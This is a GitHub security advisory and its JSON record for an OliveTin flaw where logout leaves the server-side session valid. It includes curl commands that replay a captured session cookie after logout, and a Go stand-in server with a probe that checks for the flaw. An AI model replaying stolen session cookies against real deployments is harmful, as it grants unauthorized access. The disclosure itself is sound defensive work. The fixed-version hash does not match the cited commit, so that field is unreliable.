GHSA-GQ2M-77HF-VWGH

Vulnerability from github – Published: 2026-03-05 20:53 – Updated: 2026-03-06 22:52
Summary
OliveTin Session Fixation: Logout Fails to Invalidate Server-Side Session
Details

Summary

OliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year).

An attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.

This is a session management flaw that violates expected logout semantics. The record lists CWE-384 (Session Fixation) and CWE-613 (Insufficient Session Expiration); the behaviour described here, a SID that stays valid after logout, is the CWE-613 case: no attacker-chosen identifier is involved, the server simply never discards the one it issued.

Details

During logout:

// Logout only clears browser cookie
response.Header().Set("Set-Cookie", localCookie.String())

However, the server still accepts the session:

session := sessionStorage.Providers[provider].Sessions[sid]
...
return session

The SID is not deleted from sessionStorage.

Why vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).

File: api.go, sessions.go, local.go
Lines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47

Behavior
  • Login → receive SID cookie
  • Logout → cookie cleared client-side
  • Replay old SID manually → still authenticated

Expected:
  • Logout invalidates session immediately

Actual:
  • Old SID remains usable until expiry

PoC

Minimal config

listenAddressSingleHTTPFrontend: 0.0.0.0:16642
authRequireGuestsToLogin: true

authLocalUsers:
  enabled: true
  users:
    - username: low
      usergroup: users
      password: "$argon2id$..."

actions:
  - title: Dummy
    id: dummy
    shell: "echo dummy"

Reproduction

Login and capture SID:

LOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')

SID=$(printf '%s\n' "$LOGIN" | awk -F'[=;]' '/olivetin-sid-local/{print $2}')

Works before logout:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Logout:

curl -X POST http://localhost:16642/api/Logout \
  -H "Cookie: olivetin-sid-local=$SID"

Replay old cookie:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Result

User is still authenticated after logout.
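The server-side flaw described under Details and the replay sequence in the PoC, as one added example in Go that is not OliveTin's code: a stand-in server with the three endpoints the advisory drives, switchable between the flawed logout (browser cookie cleared only) and a logout that also deletes the SID from the store, plus a probe that runs the login, WhoAmI, Logout, WhoAmI sequence with the old SID attached by hand and reports a verdict. The cookie name and endpoint paths are taken from the advisory; the in-memory map, the elided password check and the verdict strings are assumptions of this example, not OliveTin's implementation.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Cookie and endpoint names follow the advisory; the store and handlers are stand-ins.
const cookieName = "olivetin-sid-local"

// newHandler serves the PoC's three endpoints over a stand-in for OliveTin's sessionStorage
// (sid -> username; unguarded since the probe sends one request at a time). With
// revokeOnLogout=false Logout only clears the browser cookie, which is the flaw. No password check.
func newHandler(store map[string]string, revokeOnLogout bool) http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/api/LocalUserLogin", func(w http.ResponseWriter, r *http.Request) {
		b := make([]byte, 16)
		if _, err := rand.Read(b); err != nil {
			panic(err)
		}
		sid := hex.EncodeToString(b)
		store[sid] = "low"
		http.SetCookie(w, &http.Cookie{Name: cookieName, Value: sid, Path: "/", HttpOnly: true})
	})
	mux.HandleFunc("/api/WhoAmI", func(w http.ResponseWriter, r *http.Request) {
		// Same shape as sessionStorage.Providers[provider].Sessions[sid]: a bare map lookup.
		if c, err := r.Cookie(cookieName); err == nil {
			if user, ok := store[c.Value]; ok {
				fmt.Fprint(w, user)
				return
			}
		}
		http.Error(w, "guest", http.StatusUnauthorized)
	})
	mux.HandleFunc("/api/Logout", func(w http.ResponseWriter, r *http.Request) {
		if c, err := r.Cookie(cookieName); err == nil && revokeOnLogout {
			delete(store, c.Value) // the missing step: drop the SID server-side
		}
		// Both variants clear the browser cookie, which is all the flawed logout did.
		http.SetCookie(w, &http.Cookie{Name: cookieName, Value: "", Path: "/", MaxAge: -1})
	})
	return mux
}

// post attaches sid by hand, as the curl commands do (no cookie jar, so the old SID is replayed).
func post(base, path, sid, body string) (int, []*http.Cookie, error) {
	req, err := http.NewRequest(http.MethodPost, base+path, strings.NewReader(body))
	if err != nil {
		return 0, nil, err
	}
	if sid != "" {
		req.AddCookie(&http.Cookie{Name: cookieName, Value: sid})
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return 0, nil, err
	}
	resp.Body.Close()
	return resp.StatusCode, resp.Cookies(), nil
}

// probe replays the PoC (login, WhoAmI, Logout, WhoAmI with the old SID) and returns a verdict.
func probe(base string) (string, error) {
	_, cookies, err0 := post(base, "/api/LocalUserLogin", "", `{"username":"low","password":"lowpass"}`)
	var sid string
	for _, c := range cookies {
		if c.Name == cookieName {
			sid = c.Value
		}
	}
	before, _, err1 := post(base, "/api/WhoAmI", sid, "")
	_, _, err2 := post(base, "/api/Logout", sid, "")
	after, _, err3 := post(base, "/api/WhoAmI", sid, "")
	if err := errors.Join(err0, err1, err2, err3); err != nil {
		return "", err
	}
	switch {
	case before == http.StatusOK && after == http.StatusOK:
		return "VULNERABLE: old SID still accepted after logout", nil
	case before == http.StatusOK && after == http.StatusUnauthorized:
		return "FIXED: logout revoked the server-side session", nil
	}
	return fmt.Sprintf("INCONCLUSIVE: WhoAmI before=%d after=%d", before, after), nil
}

func runAgainst(revokeOnLogout bool) (string, error) {
	srv := httptest.NewServer(newHandler(map[string]string{}, revokeOnLogout))
	defer srv.Close()
	return probe(srv.URL)
}

func main() {
	fmt.Println(runAgainst(false)) // VULNERABLE: old SID still accepted after logout <nil>
	fmt.Println(runAgainst(true))  // FIXED: logout revoked the server-side session <nil>
}
```

Running the file prints both verdicts against the stand-in. Pointed at a real instance, probe performs the same check as the curl commands; there the login body must carry valid credentials, since the stand-in's elided password check applies on the real server, and the verdict distinguishes a genuine fix (401 after logout) from an inconclusive run where the first WhoAmI already failed.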

Impact

Type:

Session Management Flaw

  • Logout Bypass
  • Session Replay

Risk:
  • Stolen cookies remain valid
  • Persistent unauthorized access
  • Users falsely believe logout ended the session

Attack scenarios:
  • Shared computers
  • XSS/session theft
  • Proxy logs
  • Malware/browser compromise


{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/OliveTin/OliveTin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260304233115-d6a0abc3755d15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30224"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-384",
      "CWE-613"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T20:53:08Z",
    "nvd_published_at": "2026-03-06T21:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nOliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default \u2248 1 year).\n\nAn attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.\n\nThis is a session management flaw that violates expected logout semantics.\n\n### Details\nDuring logout:\n```\n// Logout only clears browser cookie\nresponse.Header().Set(\"Set-Cookie\", localCookie.String())\n```\nHowever, the server still accepts the session:\n```\nsession := sessionStorage.Providers[provider].Sessions[sid]\n...\nreturn session\n```\nThe SID is not deleted from sessionStorage.\n\nWhy vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).\n\nFile: [api.go](app://-/index.html?hostId=local#), [sessions.go](app://-/index.html?hostId=local#), [local.go](app://-/index.html?hostId=local#)\nLines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47\nBehavior\n- Login \u2192 receive SID cookie\n- Logout \u2192 cookie cleared client-side\n- Replay old SID manually \u2192 still authenticated\n\nExpected:\n- Logout invalidates session immediately\n\nActual:\n- Old SID remains usable until expiry\n\n### PoC\n\nMinimal config\n```\nlistenAddressSingleHTTPFrontend: 0.0.0.0:16642\nauthRequireGuestsToLogin: true\n\nauthLocalUsers:\n  enabled: true\n  users:\n    - username: low\n      usergroup: users\n      password: \"$argon2id$...\"\n\nactions:\n  - title: Dummy\n    id: dummy\n    shell: \"echo dummy\"\n```\n\n### Reproduction\n\nLogin and capture SID:\n```\nLOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"low\",\"password\":\"lowpass\"}\u0027)\n\nSID=$(printf \u0027%s\\n\u0027 \"$LOGIN\" | awk -F\u0027[=;]\u0027 \u0027/olivetin-sid-local/{print $2}\u0027)\n```\nWorks before logout:\n```\ncurl -X POST http://localhost:16642/api/WhoAmI \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nLogout:\n```\ncurl -X POST http://localhost:16642/api/Logout \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nReplay old cookie:\n```\ncurl -X POST http://localhost:16642/api/WhoAmI \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nResult\n\nUser is still authenticated after logout.\n### Impact\nType:\n\nSession Management Flaw\n\n- Logout Bypass\n- Session Replay\n\nRisk:\n- Stolen cookies remain valid\n- Persistent unauthorized access\n- Users falsely believe logout ended the session\n\nAttack scenarios:\n- Shared computers\n- XSS/session theft\n- Proxy logs\n- Malware/browser compromise",
  "id": "GHSA-gq2m-77hf-vwgh",
  "modified": "2026-03-06T22:52:14Z",
  "published": "2026-03-05T20:53:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-gq2m-77hf-vwgh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30224"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/commit/d6a0abc3755d43107be1939567c52953bcbec3d5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OliveTin/OliveTin"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OliveTin Session Fixation: Logout Fails to Invalidate Server-Side Session"
}

